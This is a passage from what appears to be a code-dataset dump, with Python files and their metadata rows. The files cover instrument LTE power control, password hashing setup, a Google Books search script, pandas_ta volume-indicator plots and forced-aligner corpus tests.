time.sleep(float(self.cell_2_time))
def manage_cell_1_power(self, cell_1_flag):
self.cmw_connection.timeout = 20000
self.cmw_connection.write("CONFigure:LTE:SIGN1:DL:PCC:RSEPre:LEVel " + str(cell_1_flag))
self.cmw_connection.write("CONFigure:LTE:SIGN1:DL:PCC:RSEPre:LEVel?")
print('Channel 1: ' + self.cmw_connection.read() + ' [dBm]') # Wyślij do okna logowania
self.cmw_connection.clear()
def manage_cell_2_power(self, cell_2_flag):
self.cmw_connection.timeout = 20000
self.cmw_connection.write("CONFigure:LTE:SIGN2:DL:PCC:RSEPre:LEVel " + str(cell_2_flag))
self.cmw_connection.write("CONFigure:LTE:SIGN2:DL:PCC:RSEPre:LEVel?")
print('Channel 2: ' + self.cmw_connection.read() + ' [dBm]') # Wyślij do okna logowania
self.cmw_connection.clear()
| 49.825472
| 116
| 0.513964
| 1,324
| 10,563
| 3.695619
| 0.066465
| 0.103209
| 0.159411
| 0.091559
| 0.807889
| 0.774167
| 0.733088
| 0.70325
| 0.70325
| 0.6589
| 0
| 0.040554
| 0.358042
| 10,563
| 211
| 117
| 50.061611
| 0.681021
| 0.025182
| 0
| 0.63125
| 0
| 0
| 0.077198
| 0.019647
| 0
| 0
| 0
| 0
| 0
| 1
| 0.0375
| false
| 0
| 0.01875
| 0
| 0.0625
| 0.1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
1347bb51921a1449a797a7ccd365d2b4b2b2c105
| 30
|
py
|
Python
|
charles/__init__.py
|
LostRabbitLabs/DeathMetal
|
a5f06aae9028c09e55b193255d4f7a45aa471a46
|
[
"MIT"
] | 6
|
2019-11-13T23:59:40.000Z
|
2020-01-22T22:53:53.000Z
|
charles/__init__.py
|
LostRabbitLabs/DeathMetal
|
a5f06aae9028c09e55b193255d4f7a45aa471a46
|
[
"MIT"
] | null | null | null |
charles/__init__.py
|
LostRabbitLabs/DeathMetal
|
a5f06aae9028c09e55b193255d4f7a45aa471a46
|
[
"MIT"
] | null | null | null |
from charles.charles import *
| 15
| 29
| 0.8
| 4
| 30
| 6
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.133333
| 30
| 1
| 30
| 30
| 0.923077
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
13686fde95aeb4a3a7d3cbd2d1c114790532b999
| 7
|
py
|
Python
|
test/assignment_samples/coma_instead_of_period_error.py
|
K44rel/error-explainer
|
786fa558efd0c26534e51a27924167000f1d1eef
|
[
"MIT"
] | 3
|
2022-01-05T19:07:06.000Z
|
2022-03-15T21:50:48.000Z
|
test/assignment_samples/coma_instead_of_period_error.py
|
kaareloide/error-explainer
|
786fa558efd0c26534e51a27924167000f1d1eef
|
[
"MIT"
] | 2
|
2021-04-13T07:20:15.000Z
|
2021-04-13T07:20:23.000Z
|
test/assignment_samples/coma_instead_of_period_error.py
|
kaareloide/error-explainer
|
786fa558efd0c26534e51a27924167000f1d1eef
|
[
"MIT"
] | null | null | null |
a = 3,4
| 7
| 7
| 0.428571
| 3
| 7
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.4
| 0.285714
| 7
| 1
| 7
| 7
| 0.2
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
138ef216098c37ceca23ef1e51ad66431774d690
| 186
|
py
|
Python
|
project_underhill/core/security.py
|
ErikSeguinte/project_underhill
|
38ed3b14e371a3bcdda13b512bcebfd7c892abd4
|
[
"MIT"
] | null | null | null |
project_underhill/core/security.py
|
ErikSeguinte/project_underhill
|
38ed3b14e371a3bcdda13b512bcebfd7c892abd4
|
[
"MIT"
] | null | null | null |
project_underhill/core/security.py
|
ErikSeguinte/project_underhill
|
38ed3b14e371a3bcdda13b512bcebfd7c892abd4
|
[
"MIT"
] | null | null | null |
from passlib.context import CryptContext
import secrets
pwd_context = CryptContext(schemes=["argon2"], deprecated="auto")
def get_random_string():
return secrets.token_urlsafe(5)
| 20.666667
| 65
| 0.784946
| 23
| 186
| 6.173913
| 0.826087
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.012121
| 0.112903
| 186
| 8
| 66
| 23.25
| 0.848485
| 0
| 0
| 0
| 0
| 0
| 0.053763
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| false
| 0.2
| 0.4
| 0.2
| 0.8
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
|
0
| 6
|
13b2200fff7ba525fde3a3e0a0da1949a62f4a35
| 136
|
py
|
Python
|
etl/loader/db/__init__.py
|
damklis/etljob
|
c72d53c9b38e1cf38307309a55f55513ced3c8a3
|
[
"BSD-2-Clause"
] | 8
|
2021-02-11T21:18:24.000Z
|
2022-02-14T15:35:36.000Z
|
etl/loader/db/__init__.py
|
damklis/etljob
|
c72d53c9b38e1cf38307309a55f55513ced3c8a3
|
[
"BSD-2-Clause"
] | 1
|
2021-06-13T10:48:07.000Z
|
2021-06-13T10:48:07.000Z
|
etl/loader/db/__init__.py
|
damklis/etljob
|
c72d53c9b38e1cf38307309a55f55513ced3c8a3
|
[
"BSD-2-Clause"
] | 2
|
2021-12-28T18:38:38.000Z
|
2022-03-01T03:25:29.000Z
|
from etl.loader.db.flight import Flight
from etl.loader.db.base import (
engine, Session, Base
)
Base.metadata.create_all(engine)
| 17
| 39
| 0.757353
| 21
| 136
| 4.857143
| 0.571429
| 0.137255
| 0.254902
| 0.294118
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.139706
| 136
| 7
| 40
| 19.428571
| 0.871795
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.4
| 0
| 0.4
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
13bf949c26c8d3e52fbd9d1d7497b3d9837ae8b9
| 18
|
py
|
Python
|
src/__init__.py
|
tborzyszkowski/TestAutomationInPython
|
843c71df796588e181466d9b9b549f03dd907a6e
|
[
"MIT"
] | 2
|
2020-10-08T09:44:12.000Z
|
2021-10-08T08:32:19.000Z
|
src/__init__.py
|
tborzyszkowski/TestAutomationInPython
|
843c71df796588e181466d9b9b549f03dd907a6e
|
[
"MIT"
] | null | null | null |
src/__init__.py
|
tborzyszkowski/TestAutomationInPython
|
843c71df796588e181466d9b9b549f03dd907a6e
|
[
"MIT"
] | 1
|
2020-10-19T14:08:00.000Z
|
2020-10-19T14:08:00.000Z
|
from .oop import *
| 18
| 18
| 0.722222
| 3
| 18
| 4.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 18
| 1
| 18
| 18
| 0.866667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
13c9802112e1dbe22e44e6663a959baa63a5e4b6
| 20
|
py
|
Python
|
acq4/devices/PVCam/__init__.py
|
ablot/acq4
|
ba7cd340d9d0282640adb501d3788f8c0837e4c4
|
[
"MIT"
] | null | null | null |
acq4/devices/PVCam/__init__.py
|
ablot/acq4
|
ba7cd340d9d0282640adb501d3788f8c0837e4c4
|
[
"MIT"
] | null | null | null |
acq4/devices/PVCam/__init__.py
|
ablot/acq4
|
ba7cd340d9d0282640adb501d3788f8c0837e4c4
|
[
"MIT"
] | null | null | null |
from PVCam import *
| 10
| 19
| 0.75
| 3
| 20
| 5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.2
| 20
| 1
| 20
| 20
| 0.9375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
13eb775a8053d935399747d2bedaf755a615d554
| 48
|
py
|
Python
|
ai/algorithms/reinforcement_learning/__init__.py
|
rbak/ai-implementations
|
5b773c23a5582b05b8aef55ea70e800cf4ffa376
|
[
"MIT"
] | null | null | null |
ai/algorithms/reinforcement_learning/__init__.py
|
rbak/ai-implementations
|
5b773c23a5582b05b8aef55ea70e800cf4ffa376
|
[
"MIT"
] | null | null | null |
ai/algorithms/reinforcement_learning/__init__.py
|
rbak/ai-implementations
|
5b773c23a5582b05b8aef55ea70e800cf4ffa376
|
[
"MIT"
] | null | null | null |
from .monte_carlo import *
from .sarsa import *
| 16
| 26
| 0.75
| 7
| 48
| 5
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 48
| 2
| 27
| 24
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
b91228598ec4e4601729a55d590f9b206cc33281
| 105
|
py
|
Python
|
cassiopeia/__main__.py
|
Lioscro/Cassiopeia
|
fa630e167b3d8e6fb1c88740dff71130224ca54c
|
[
"MIT"
] | null | null | null |
cassiopeia/__main__.py
|
Lioscro/Cassiopeia
|
fa630e167b3d8e6fb1c88740dff71130224ca54c
|
[
"MIT"
] | null | null | null |
cassiopeia/__main__.py
|
Lioscro/Cassiopeia
|
fa630e167b3d8e6fb1c88740dff71130224ca54c
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import Cassiopeia
def main():
print("Congrats, you've entered the program!")
| 15
| 50
| 0.695238
| 15
| 105
| 4.866667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.161905
| 105
| 6
| 51
| 17.5
| 0.829545
| 0.190476
| 0
| 0
| 0
| 0
| 0.440476
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0.333333
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
b9152d833ceca1361f3f634943aea24e51af6ece
| 888
|
py
|
Python
|
app/entity/user_entity.py
|
JunFuruya/Ratsnake
|
ff7fe7f6b56663978d2ee2d94df5d88786a0eaa7
|
[
"MIT"
] | null | null | null |
app/entity/user_entity.py
|
JunFuruya/Ratsnake
|
ff7fe7f6b56663978d2ee2d94df5d88786a0eaa7
|
[
"MIT"
] | 5
|
2018-05-17T04:03:39.000Z
|
2021-09-08T01:03:17.000Z
|
app/entity/user_entity.py
|
JunFuruya/Hideout
|
ff7fe7f6b56663978d2ee2d94df5d88786a0eaa7
|
[
"MIT"
] | null | null | null |
# -*- coding: UTF-8 -*-
from app.entity.base_web_entity import BaseWebEntity
from app.helper.hash_helper import HashHelper
class UserEntity(BaseWebEntity):
__user_id = None
__user_username = ''
__user_hashed_password = ''
def set_user_id(self, user_id):
self.__user_id = user_id
return self
def get_user_id(self):
return self.__user_id
def set_user_username(self, user_username):
self.__user_username = user_username
return self
def get_user_username(self):
return self.__user_username
def set_user_hashed_password(self, user_hashed_password):
self.__user_hashed_password = user_hashed_password
return self
def get_user_hashed_password(self):
return self.__user_hashed_password
#def to_array(self):
# TODO: implement
#pass
| 25.371429
| 61
| 0.672297
| 111
| 888
| 4.873874
| 0.279279
| 0.133087
| 0.232902
| 0.088725
| 0.354898
| 0.114603
| 0.114603
| 0
| 0
| 0
| 0
| 0.001522
| 0.260135
| 888
| 35
| 62
| 25.371429
| 0.821918
| 0.067568
| 0
| 0.142857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.028571
| 0
| 1
| 0.285714
| false
| 0.238095
| 0.095238
| 0.142857
| 0.857143
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
|
0
| 6
|
b944f18eebc013d50a2ec5280216bc05b7e81397
| 9,165
|
py
|
Python
|
performbooksearch.py
|
klever12/Search-Books
|
eb5fb1f03dbdcef8c9735783a1db233fccd8ead5
|
[
"MIT"
] | null | null | null |
performbooksearch.py
|
klever12/Search-Books
|
eb5fb1f03dbdcef8c9735783a1db233fccd8ead5
|
[
"MIT"
] | null | null | null |
performbooksearch.py
|
klever12/Search-Books
|
eb5fb1f03dbdcef8c9735783a1db233fccd8ead5
|
[
"MIT"
] | null | null | null |
from termcolor import colored
import json
from urllib.request import urlopen
from urllib.error import URLError
from printlists import print_searched_books
def search_books():
"""This function searches for books using the Google Books API"""
searching_books = True
api = "https://www.googleapis.com/books/v1/volumes?q="
max_results = "&maxResults=5"
print("\n")
# start performing book search
while searching_books:
user_choice = input(
colored("Would you like to search by title(t), "
"author(a), or publishing company(p)? Or "
"would you like to cancel search(c)?\n", 'red')) \
.strip()
# search by title
if user_choice == "T" or user_choice == "t":
search_term = "intitle:"
book_to_search = input(colored("Enter title to search for: ",
'red')).strip()
book_to_search = ' '.join(book_to_search.split())
book_to_search = book_to_search.replace(" ", "+")
try:
resp = urlopen(api + search_term + book_to_search +
max_results)
except URLError:
print(colored("Sorry. No internet connection detected. "
"Please check network connection and try "
"again.\n", 'red'))
return {}
book_data = json.load(resp)
if book_data['totalItems'] == 0:
print(
colored("Sorry. No books were found with that title. ",
'red'))
return {}
else:
if book_data['totalItems'] < 5:
number_books_found = book_data['totalItems']
searched_books = {}
else:
number_books_found = 5
searched_books = {}
for x in range(number_books_found):
book_title = book_data["items"][x]["volumeInfo"] \
.get('title')
book_author = book_data["items"][x]["volumeInfo"] \
.get('authors')
book_publisher = book_data["items"][x]["volumeInfo"] \
.get('publisher')
if book_title is None:
book_title = "-No Title-"
else:
book_title = book_data["items"][x]["volumeInfo"][
"title"]
if book_author is None:
book_author = ["-No author-"]
else:
book_author = book_data["items"][x]["volumeInfo"][
"authors"]
if book_publisher is None:
book_publisher = "-No Publisher-"
else:
book_publisher = \
book_data["items"][x]["volumeInfo"][
'publisher']
book_information = [book_title, book_author,
book_publisher]
searched_books[x + 1] = book_information
print_searched_books(searched_books)
return searched_books
# search by author
elif user_choice == "A" or user_choice == "a":
search_term = "inauthor:"
author_to_search = input(colored("Enter author to search for: "
, 'red')) \
.strip()
author_to_search = ' '.join(author_to_search.split())
author_to_search = author_to_search.replace(" ", "+")
try:
resp = urlopen(api + search_term + author_to_search +
max_results)
except URLError:
print(colored("Sorry. No internet connection detected. "
"Please check network connection and try "
"again.\n", 'red'))
return {}
book_data = json.load(resp)
if book_data['totalItems'] == 0:
print(
colored("Sorry. No books were found with that title. ",
'red'))
return {}
else:
if book_data['totalItems'] < 5:
number_books_found = book_data['totalItems']
searched_books = {}
else:
number_books_found = 5
searched_books = {}
for x in range(number_books_found):
book_title = book_data["items"][x]["volumeInfo"] \
.get('title')
book_author = book_data["items"][x]["volumeInfo"] \
.get('authors')
book_publisher = book_data["items"][x]["volumeInfo"] \
.get('publisher')
if book_title is None:
book_title = "-No Title-"
else:
book_title = book_data["items"][x]["volumeInfo"][
"title"]
if book_author is None:
book_author = ["-No author-"]
else:
book_author = book_data["items"][x]["volumeInfo"][
"authors"]
if book_publisher is None:
book_publisher = "-No Publisher-"
else:
book_publisher = \
book_data["items"][x]["volumeInfo"][
'publisher']
book_information = [book_title, book_author,
book_publisher]
searched_books[x + 1] = book_information
print_searched_books(searched_books)
return searched_books
# search by publisher
elif user_choice == "P" or user_choice == "p":
search_term = "inpublisher:"
publisher_to_search = input(
colored("Enter publisher to search for: ", 'red')) \
.strip()
publisher_to_search = ' '.join(publisher_to_search.split())
publisher_to_search = publisher_to_search.replace(" ", "+")
try:
resp = urlopen(api + search_term + publisher_to_search +
max_results)
except URLError:
print(colored("Sorry. No internet connection detected. "
"Please check network connection and try "
"again.\n", 'red'))
return {}
book_data = json.load(resp)
if book_data['totalItems'] == 0:
print(
colored("Sorry. No books were found with that title. ",
'red'))
return {}
else:
if book_data['totalItems'] < 5:
number_books_found = book_data['totalItems']
searched_books = {}
else:
number_books_found = 5
searched_books = {}
for x in range(number_books_found):
book_title = book_data["items"][x]["volumeInfo"] \
.get('title')
book_author = book_data["items"][x]["volumeInfo"] \
.get('authors')
book_publisher = book_data["items"][x]["volumeInfo"] \
.get('publisher')
if book_title is None:
book_title = "-No Title-"
else:
book_title = book_data["items"][x]["volumeInfo"][
"title"]
if book_author is None:
book_author = ["-No author-"]
else:
book_author = book_data["items"][x]["volumeInfo"][
"authors"]
if book_publisher is None:
book_publisher = "-No Publisher-"
else:
book_publisher = \
book_data["items"][x]["volumeInfo"][
'publisher']
book_information = [book_title, book_author,
book_publisher]
searched_books[x + 1] = book_information
print_searched_books(searched_books)
return searched_books
# cancel book search
elif user_choice == "C" or user_choice == "c":
print(colored("Book search canceled.\n", 'red'))
return {}
# user input was invalid
else:
print(colored("Sorry. That was an invalid option.\n", 'red'))
| 38.34728
| 75
| 0.441244
| 795
| 9,165
| 4.860377
| 0.142138
| 0.062112
| 0.060559
| 0.065217
| 0.744048
| 0.709886
| 0.709886
| 0.709886
| 0.709886
| 0.677277
| 0
| 0.002853
| 0.464594
| 9,165
| 238
| 76
| 38.508403
| 0.784593
| 0.020076
| 0
| 0.792553
| 0
| 0
| 0.154961
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.005319
| false
| 0
| 0.026596
| 0
| 0.085106
| 0.069149
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
b967e5257f48f996a8a9f4440fee5546624a41d2
| 8,977
|
py
|
Python
|
technical_analysis/volume.py
|
benkulbertis/GamestonkTerminal
|
f1ebf7c3082b7d985e038fdb4021be317be001d2
|
[
"MIT"
] | null | null | null |
technical_analysis/volume.py
|
benkulbertis/GamestonkTerminal
|
f1ebf7c3082b7d985e038fdb4021be317be001d2
|
[
"MIT"
] | null | null | null |
technical_analysis/volume.py
|
benkulbertis/GamestonkTerminal
|
f1ebf7c3082b7d985e038fdb4021be317be001d2
|
[
"MIT"
] | null | null | null |
import argparse
import pandas_ta as ta
import matplotlib.pyplot as plt
from pandas.plotting import register_matplotlib_converters
from helper_funcs import check_positive
register_matplotlib_converters()
# ------------------------------------------------------- AD -------------------------------------------------------
def ad(l_args, s_ticker, s_interval, df_stock):
parser = argparse.ArgumentParser(prog='ad',
description=""" The Accumulation/Distribution Line is similar to the On Balance
Volume (OBV), which sums the volume times +1/-1 based on whether the close is
higher than the previous close. The Accumulation/Distribution indicator, however
multiplies the volume by the close location value (CLV). The CLV is based on the
movement of the issue within a single bar and can be +1, -1 or zero. \n \n
The Accumulation/Distribution Line is interpreted by looking for a divergence in
the direction of the indicator relative to price. If the Accumulation/Distribution
Line is trending upward it indicates that the price may follow. Also, if the
Accumulation/Distribution Line becomes flat while the price is still rising (or falling)
then it signals an impending flattening of the price.""")
parser.add_argument('-o', "--offset", action="store", dest="n_offset", type=check_positive, default=0, help='offset')
parser.add_argument('--open', action="store_true", default=False, dest="b_use_open", help='uses open value of stock')
(ns_parser, l_unknown_args) = parser.parse_known_args(l_args)
if l_unknown_args:
print(f"The following args couldn't be interpreted: {l_unknown_args}\n")
return
# Daily
if s_interval == "1440min":
# Use open stock values
if ns_parser.b_use_open:
df_ta = ta.ad(high=df_stock['2. high'], low=df_stock['3. low'], close=df_stock['5. adjusted close'],
volume=df_stock['6. volume'], offset=ns_parser.n_offset, open_=df_stock['1. open']).dropna()
# Do not use open stock values
else:
df_ta = ta.ad(high=df_stock['2. high'], low=df_stock['3. low'], close=df_stock['5. adjusted close'],
volume=df_stock['6. volume'], offset=ns_parser.n_offset).dropna()
axPrice = plt.subplot(211)
plt.plot(df_stock.index, df_stock['5. adjusted close'].values, 'k', lw=2)
plt.title(f"Accumulation/Distribution Line (AD) on {s_ticker}")
plt.xlim(df_stock.index[0], df_stock.index[-1])
plt.ylabel(f'Share Price ($)')
plt.grid(b=True, which='major', color='#666666', linestyle='-')
plt.minorticks_on()
plt.grid(b=True, which='minor', color='#999999', linestyle='-', alpha=0.2)
axVolume = axPrice.twinx()
plt.bar(df_stock.index, df_stock['6. volume'].values, color='k', alpha=0.8, width=.3)
plt.subplot(212)
plt.plot(df_ta.index, df_ta.values, 'b', lw=1)
plt.xlim(df_stock.index[0], df_stock.index[-1])
plt.axhline(0, linewidth=2, color='k', ls='--')
plt.legend([f'Chaikin Oscillator'])
plt.xlabel('Time')
plt.grid(b=True, which='major', color='#666666', linestyle='-')
plt.minorticks_on()
plt.grid(b=True, which='minor', color='#999999', linestyle='-', alpha=0.2)
plt.show()
# Intraday
else:
# Use open stock values
if ns_parser.b_use_open:
df_ta = ta.ad(high=df_stock['2. high'], low=df_stock['3. low'], close=df_stock['4. close'],
volume=df_stock['5. volume'], offset=ns_parser.n_offset, open_=df_stock['1. open']).dropna()
# Do not use open stock values
else:
df_ta = ta.ad(high=df_stock['2. high'], low=df_stock['3. low'], close=df_stock['4. close'],
volume=df_stock['5. volume'], offset=ns_parser.n_offset).dropna()
axPrice = plt.subplot(211)
plt.plot(df_stock.index, df_stock['4. close'].values, 'k', lw=2)
plt.title(f"Accumulation/Distribution Line (AD) on {s_ticker}")
plt.xlim(df_stock.index[0], df_stock.index[-1])
plt.ylabel(f'Share Price ($)')
plt.grid(b=True, which='major', color='#666666', linestyle='-')
plt.minorticks_on()
plt.grid(b=True, which='minor', color='#999999', linestyle='-', alpha=0.2)
axVolume = axPrice.twinx()
plt.bar(df_stock.index, df_stock['5. volume'].values, color='k', alpha=0.8, width=.3)
plt.subplot(212)
plt.plot(df_ta.index, df_ta.values, 'b', lw=1)
plt.xlim(df_stock.index[0], df_stock.index[-1])
plt.axhline(0, linewidth=2, color='k', ls='--')
plt.legend([f'Chaikin Oscillator'])
plt.xlabel('Time')
plt.grid(b=True, which='major', color='#666666', linestyle='-')
plt.minorticks_on()
plt.grid(b=True, which='minor', color='#999999', linestyle='-', alpha=0.2)
plt.show()
print("")
# ------------------------------------------------------- OBV -------------------------------------------------------
def obv(l_args, s_ticker, s_interval, df_stock):
parser = argparse.ArgumentParser(prog='obv',
description=""" The On Balance Volume (OBV) is a cumulative total of the up and
down volume. When the close is higher than the previous close, the volume is added
to the running total, and when the close is lower than the previous close, the volume
is subtracted from the running total. \n \n To interpret the OBV, look for the OBV
to move with the price or precede price moves. If the price moves before the OBV,
then it is a non-confirmed move. A series of rising peaks, or falling troughs, in the
OBV indicates a strong trend. If the OBV is flat, then the market is not trending. """)
parser.add_argument('-o', "--offset", action="store", dest="n_offset", type=check_positive, default=0, help='offset')
(ns_parser, l_unknown_args) = parser.parse_known_args(l_args)
if l_unknown_args:
print(f"The following args couldn't be interpreted: {l_unknown_args}\n")
return
# Daily
if s_interval == "1440min":
df_ta = ta.obv(close=df_stock['5. adjusted close'], volume=df_stock['6. volume'], offset=ns_parser.n_offset).dropna()
axPrice = plt.subplot(211)
plt.plot(df_stock.index, df_stock['5. adjusted close'].values, 'k', lw=2)
plt.title(f"On-Balance Volume (OBV) on {s_ticker}")
plt.xlim(df_stock.index[0], df_stock.index[-1])
plt.ylabel(f'Share Price ($)')
plt.grid(b=True, which='major', color='#666666', linestyle='-')
plt.minorticks_on()
plt.grid(b=True, which='minor', color='#999999', linestyle='-', alpha=0.2)
axVolume = axPrice.twinx()
plt.bar(df_stock.index, df_stock['6. volume'].values, color='k', alpha=0.8, width=.3)
plt.subplot(212)
plt.plot(df_ta.index, df_ta.values, 'b', lw=1)
plt.xlim(df_stock.index[0], df_stock.index[-1])
plt.legend([f'OBV'])
plt.xlabel('Time')
plt.grid(b=True, which='major', color='#666666', linestyle='-')
plt.minorticks_on()
plt.grid(b=True, which='minor', color='#999999', linestyle='-', alpha=0.2)
plt.show()
# Intraday
else:
df_ta = ta.obv(close=df_stock['4. close'], volume=df_stock['5. volume'], offset=ns_parser.n_offset).dropna()
axPrice = plt.subplot(211)
plt.plot(df_stock.index, df_stock['5. adjusted close'].values, 'k', lw=2)
plt.title(f"On-Balance Volume (OBV) on {s_ticker}")
plt.xlim(df_stock.index[0], df_stock.index[-1])
plt.ylabel(f'Share Price ($)')
plt.grid(b=True, which='major', color='#666666', linestyle='-')
plt.minorticks_on()
plt.grid(b=True, which='minor', color='#999999', linestyle='-', alpha=0.2)
axVolume = axPrice.twinx()
plt.bar(df_stock.index, df_stock['5. volume'].values, color='k', alpha=0.8, width=.3)
plt.subplot(212)
plt.plot(df_ta.index, df_ta.values, 'b', lw=1)
plt.xlim(df_stock.index[0], df_stock.index[-1])
plt.legend([f'OBV'])
plt.xlabel('Time')
plt.grid(b=True, which='major', color='#666666', linestyle='-')
plt.minorticks_on()
plt.grid(b=True, which='minor', color='#999999', linestyle='-', alpha=0.2)
plt.show()
print("")
| 53.118343
| 126
| 0.576473
| 1,225
| 8,977
| 4.10449
| 0.162449
| 0.077963
| 0.057279
| 0.038186
| 0.788783
| 0.753779
| 0.753779
| 0.742442
| 0.742442
| 0.726929
| 0
| 0.033018
| 0.25777
| 8,977
| 168
| 127
| 53.434524
| 0.721597
| 0.040325
| 0
| 0.742647
| 0
| 0.014706
| 0.343794
| 0.020339
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014706
| false
| 0
| 0.036765
| 0
| 0.066176
| 0.029412
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
b9741d025777f285c24df3d3b3df57b59900819a
| 17,508
|
py
|
Python
|
tests/test_corpus.py
|
erayee/Montreal-Forced-Aligner
|
becd3b316d1999212910b4d0976e8c0405241493
|
[
"MIT"
] | null | null | null |
tests/test_corpus.py
|
erayee/Montreal-Forced-Aligner
|
becd3b316d1999212910b4d0976e8c0405241493
|
[
"MIT"
] | null | null | null |
tests/test_corpus.py
|
erayee/Montreal-Forced-Aligner
|
becd3b316d1999212910b4d0976e8c0405241493
|
[
"MIT"
] | null | null | null |
import os
import shutil
import pytest
from montreal_forced_aligner.corpus import AlignableCorpus, TranscribeCorpus
from montreal_forced_aligner.corpus.base import get_wav_info, SoxError
from montreal_forced_aligner.dictionary import Dictionary
from montreal_forced_aligner.config.train_config import train_yaml_to_config
def test_mp3(mp3_test_path):
try:
info = get_wav_info(mp3_test_path)
except SoxError:
pytest.skip()
assert 'sox_string' in info
def test_add(basic_corpus_dir, generated_dir):
